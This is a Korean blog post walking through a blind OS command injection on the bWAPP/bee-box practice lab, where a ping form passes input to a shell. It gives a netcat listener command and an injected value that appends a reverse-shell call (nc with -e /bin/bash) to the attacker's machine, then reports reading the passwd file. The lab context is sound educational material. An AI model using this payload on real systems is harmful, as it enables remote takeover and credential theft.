취약점/Bee-Box

A1-Injection OS Command Injection - Blind 비박스(bWAPP)

시큐렛 2019. 12. 3. 23:22

OS Command Injection이란?

공격자가 서버에 임의의 운영 체제(OS) 명령을 실행하여 서버에 대한 정보를 획득하거나 데이터를 변조 및 삭제할 수 있는 웹 취약점이다.


OS Command Injection 메인 페이지

페이지에 접근하면 자신의 IP주소를 입력하라는 창이 나오고 PING버튼을 누르면 골든 패킷을 캡처했냐는 문구가 나온다.

소스코드

페이지의 소스코드 확인시 박스 안에 내용이 있을 경우  ping -c 1 "박스 내용" 명령어를 보내는 것을 확인하였다.

 

칼리리눅스 넷켓

nc -vlp 5656

칼리 리눅스에서 넷켓을 사용하여 5656 포트를 열었다.

넷켓 접근

192.168.37.129&&nc -vn 192.168.37.128 5656 -e /bin/bash

위 코드를 삽입하여 칼리리눅스에 접근하였다. (칼리 리눅스 IP : 192.168.37.128)

접근 성공

비박스에서 접근이 완료된 것을 확인할수있다. (비박스 IP : 192.168.37.129)

원격에서 명령어 실행

이후 칼리리눅스에서 원격으로 비박스의 현재 위치를 확인하고 (pwd) passwd파일을 열었다.